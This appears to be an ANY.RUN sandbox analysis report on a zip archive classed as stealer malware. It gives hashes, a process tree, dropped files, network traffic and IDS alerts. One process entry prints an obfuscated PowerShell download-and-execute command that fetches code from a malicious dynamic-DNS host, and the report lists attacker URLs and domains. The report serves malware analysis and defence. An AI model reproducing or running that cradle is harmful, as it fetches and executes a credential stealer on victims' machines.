File name: | 30032020-master.zip |
Full analysis: | https://app.any.run/tasks/7eeed7f8-34be-4a4f-9df7-603d2d8c901f |
Verdict: | Malicious activity |
Threats: | Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. |
Analysis date: | March 31, 2020, 02:21:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v1.0 to extract |
MD5: | 5F61C074AFCA4474E8E730CE54AE4A53 |
SHA1: | 4034172F262922FBB60457CFA09E43B10E21A46A |
SHA256: | 819E308CAFFB26D16FBF7A10372EE5B9EBF7748799918DC3E0B125E52F8106C0 |
SSDEEP: | 1536:qmWlmcNQnkIbVnpm843iG4BKjofbLGIooyOqnDZa:qdANbVo8IiPfGRdOqDZa |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | 30032020-master/ |
---|---|
ZipUncompressedSize: | - |
ZipCompressedSize: | - |
ZipCRC: | 0x00000000 |
ZipModifyDate: | 2020:03:30 09:50:24 |
ZipCompression: | None |
ZipBitFlag: | - |
ZipRequiredVersion: | 10 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2896 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\30032020-master.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3776 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\30032020-master.zip" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3312 | "C:\Users\admin\AppData\Local\Temp\Rar$EXa3776.18890\30032020-master\x.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXa3776.18890\30032020-master\x.exe | — | WinRAR.exe |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Installer Exit code: 2147942402 Version: 1.3.35.441 | ||||
3348 | "C:\Users\admin\Desktop\x.exe" | C:\Users\admin\Desktop\x.exe | — | explorer.exe |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Installer Exit code: 2147942402 Version: 1.3.35.441 | ||||
3708 | cmd /c ""C:\Users\admin\Desktop\3003-comprobantedigital.cmd" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3376 | C:\Windows\system32\cmd.exe /S /D /c" echo ieX("Ie`X`(N`ew-oBJ`e`Ct N`et.`Web`ClIeNt`).DOwnlOa`d`StRIN`G('http://jkue.myftp.biz/mx/H1K7R4Y9I5E9b3cnShl/kk/H1K7R4Y9I5E9b3cnShl')"); " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3096 | WindowsPowerShell\v1.0\powershell.exe -nop -win 1 - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3328 | "C:\Users\admin\Desktop\x.exe" | C:\Users\admin\Desktop\x.exe | — | explorer.exe |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Installer Exit code: 2147942402 Version: 1.3.35.441 | ||||
4048 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Exit code: 0 Version: 14.0.6025.1000 | ||||
3548 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\System32\SearchProtocolHost.exe | — | SearchIndexer.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Exit code: 0 Version: 7.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3776 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3776.18620\30032020-master\3003-comprobantedigital.cmd | — | |
MD5:— | SHA256:— | |||
3776 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3776.20321\30032020-master\x.exe | — | |
MD5:— | SHA256:— | |||
3096 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4E0EFL7C0BANSASWQ64B.temp | — | |
MD5:— | SHA256:— | |||
3096 | powershell.exe | C:\Users\Public\_aqdnxu4_\12.dll | — | |
MD5:— | SHA256:— | |||
3096 | powershell.exe | C:\users\public\_aqdnxu4_\_aqdnxu4_.LNS | — | |
MD5:— | SHA256:— | |||
4048 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVREFF1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3096 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3B712DE36DC1672EC51A90C5EE31744F | SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1 | |||
3096 | powershell.exe | C:\users\public\_aqdnxu4_\_aqdnxu4_.zip | compressed | |
MD5:76602E69A246E4061FAB5BA5715DA300 | SHA256:CECC7161B3F8E8CCE0340CF23F9DB70E924F019F952D3AA8218811BFCA1EEA21 | |||
3096 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa7c2c7.TMP | binary | |
MD5:3B712DE36DC1672EC51A90C5EE31744F | SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1 | |||
3776 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa3776.18890\30032020-master\3003-comprobantedigital.cmd | text | |
MD5:32F5280DE01983ACD75606892503BEEF | SHA256:DDF11349B052D4740A12F4DC5AE02E76C92C280228F967BED8DC671CF832827E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4048 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
3096 | powershell.exe | POST | 200 | 89.36.213.180:80 | http://jkue.myftp.biz/mx/lists/kk/index.php?list | FR | — | — | malicious |
3096 | powershell.exe | GET | 200 | 89.36.213.180:80 | http://jkue.myftp.biz/mx/H1K7R4Y9I5E9b3cnShlMD/kk/md.zip | FR | compressed | 12.2 Mb | malicious |
3096 | powershell.exe | GET | 200 | 89.36.213.180:80 | http://jkue.myftp.biz/mx/H1K7R4Y9I5E9b3cnShl/kk/H1K7R4Y9I5E9b3cnShl | FR | text | 15.3 Kb | malicious |
3892 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
3096 | powershell.exe | POST | 200 | 89.36.213.180:80 | http://jkue.myftp.biz/mx/H1K7R4Y9I5E9b3cnShl/kk/index.php | FR | text | 6 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3892 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
3896 | _aqdnxu4_.exe | 89.36.213.180:443 | jkue.myftp.biz | Aruba SAS | FR | malicious |
3096 | powershell.exe | 89.36.213.180:80 | jkue.myftp.biz | Aruba SAS | FR | malicious |
4048 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
jkue.myftp.biz |
| malicious |
config.messenger.msn.com |
| whitelisted |
newlife2020.club |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a Suspicious *.myftp.biz Domain |
— | — | Potentially Bad Traffic | ET INFO Observed DNS Query to .biz TLD |
3096 | powershell.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.myftp.biz Domain |
3096 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell/Agent.HG |
3096 | powershell.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.myftp.biz Domain |
3096 | powershell.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.myftp.biz Domain |
3096 | powershell.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.myftp.biz Domain |
3896 | _aqdnxu4_.exe | Potentially Bad Traffic | ET INFO TLS Handshake Failure |